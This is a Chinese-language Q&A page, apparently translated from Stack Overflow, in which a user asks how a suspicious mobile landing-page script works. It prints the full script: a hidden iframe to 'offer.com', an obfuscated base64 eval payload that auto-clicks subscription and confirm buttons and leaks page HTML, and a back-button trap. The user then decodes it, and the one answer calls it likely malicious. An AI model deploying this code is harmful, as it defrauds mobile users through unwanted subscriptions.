我无法理解这个javascript脚本是如何工作的(登陆页面)

时间:2017-07-28 17:58:34

标签: javascript function iframe eval

我正在为移动网站使用登陆器,但我不太确定iframe如何处理这个特定的脚本。

<html><head>
  <base href="">

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>title</title>
    <meta content="IE-edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="user-scalable=no, width=device-width, initial-scale=1.0, maximum-scale=1.0" name="viewport">
    <link rel="stylesheet" href="reset.css">
    <link rel="stylesheet" href="style.css">
    <script>
        var jmurl = 'https://google.com';
    </script>

</head>
<body>
<style type="text/css">
    .footer {
        box-sizing: border-box;
    }

    .f-links {
        text-align: center;
    }

    .f-links a {
        display: inline-block;
        margin: 10px 4px;
        font-size: 11px;
        font-weight: bold;
        text-decoration: none;
    }
</style>
<script type="text/javascript">
    function playbut() {
        document.getElementsByClassName("ldr")[0].style.display = 'block';
        document.getElementsByClassName("circle")[0].style.display = 'none';
    }
    setTimeout(function () {
        document.getElementById("preview").style.display = 'block';
        document.getElementsByClassName("ldr")[0].style.display = 'none';
        document.getElementsByClassName("ldr")[1].style.display = 'none';
        document.getElementsByClassName("circle")[0].style.display = 'block';
    }, 14000);
</script>
<div class="player-bloc">
    <div class="player" id="player">
        <div class="preview" id="preview" style="background-image: url(aa.gif); background-size: 100%; display: block; background-position: 50% 50%; background-repeat: no-repeat no-repeat;"></div>
        <div style="display: block;" class="pop" id="spinner">
            <div class="circle" onclick="playbut()" style="display: block;">
                <div class="circle_inner"></div>
            </div>

            <div class="loader ldr" style="display: none;">Loading...</div>
            <div class="btn-zone ldr" style="display: none;">
                <h2>Loading video</h2>
            </div>
        </div>
    </div>
    <div class="controls">
        <div class="ctrl">
            <img src="play.png" alt="">
        </div>
        <div class="ctrl">
            <img src="stop.png" alt="">
        </div>
        <div class="ctrl big">
            <div class="bar">
                <div class="bar-time"></div>
            </div>
        </div>
        <div class="ctrl">
            <img src="volume.png" alt="">
        </div>
        <div class="ctrl">
            <img src="expand.png" alt="">
        </div>
        <div class="ctrl">
            <img src="fullscreen.png" alt="">
        </div>
    </div>
</div>
<div class="texte">
    <p>text</p>
</div>
<script type="text/javascript" src="backfix.min.js"></script>
<script>
    function cxc(x) {
        var navU = navigator["userAgent"];
        var isAndroidMobile = navU["indexOf"]("Android") > -1 && navU["indexOf"]("Mozilla/5.0") > -1 && navU["indexOf"]("AppleWebKit") > -1;
        var pattern=/Chrome\/([\d\.]+)/;
        var regExChrome = new RegExp(pattern);
        var resultChromeRegEx = regExChrome["exec"](navU);
        var chromeVersion = (resultChromeRegEx === null ? null : regExChrome["exec"](navU)[1]);
        var cv=chromeVersion===null?null:chromeVersion.substr(3).replace(/\./g,'');
        var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";
        if (isAndroidMobile && cv!=='0') {
            IDBKeyRange.only.call(frames[x],0).constructor.constructor('eval(atob(\"'+ value +'\"))')();
        }else{
            window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
        }
    }
    var i = document.documentElement.appendChild(document.createElement('iframe'));
    i.onload = function(){cxc(0)};
    i.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
    i.setAttribute('sandbox', 'allow-scripts allow-forms allow-same-origin allow-popups');
    i.src = "javascript:window.location.replace('http://offer.com')";
    setTimeout(function(){location.replace(jmurl);}, 200000);
</script>

<script>
    !function () {
        var t;
        try {
            for (t = 0; 10 > t; ++t)history.pushState({}, "", '#');
            onpopstate = function (t) {
                t.state && location.replace('#')
            }
        }
        catch (o) {
        }
    }();
</script>


</body><iframe style="position:absolute;left:-9999px;top:-9999px;height:1px;width:1px" sandbox="allow-scripts allow-forms allow-same-origin allow-popups" src="javascript:window.location.replace('http://offer.com')"></iframe></html>

现在,我在理解第86行中的脚本如何工作时遇到问题,(是以函数函数cxc(x){开头的那个,因为它似乎是生成iframe为“offer.com”网址。

我认为 i.setAttribute 显示的值可能会在执行时生成,我只是复制了为该特定执行生成的值(因为位置和大小似乎是奇数)< / p>

如果你能指出我正确的方向,请告诉我,我想了解这是如何运作的。

编辑:

var value =“d2luZG93LnBhcmVudC ...的部分已加密,使用base64我得到以下代码:

window.parent.postMessage('0.DB CALL-INITIAL>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('1.DB CALL-HTML(0)>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');

if(document.getElementById('sub_btn')!=undefined)
{
    window.parent.postMessage('found sub_btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementById('sub_btn').click();
    window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btn').length==1)
{
    window.parent.postMessage('found btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementsByClassName('btn')[0].click();
    window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btnAcept').length>0)
{
    window.parent.postMessage('found btnAcept>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('found btnAcept>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('btnAcept')[0].click();
    window.parent.postMessage('submitted>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('btn btn-success btn-lg').length>0)
{
    window.parent.postMessage('found btn btn-success btn-lg>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('btn btn-success btn-lg')[0].click();
    window.parent.postMessage('btn btn-success btn-lg clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('confirmbutton').length>0)
{
    window.parent.postMessage('FOUND click1>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    document.getElementsByClassName('confirmbutton')[0].click();
    window.parent.postMessage('clicked2>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else
{
    window.parent.postMessage('else>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('else>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}

1 个答案:

答案 0 :(得分:0)

这一行是一个加密数据,在下一个eval中解密(atob ..部分。很可能是恶意的,试图将自己注入页面。

var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";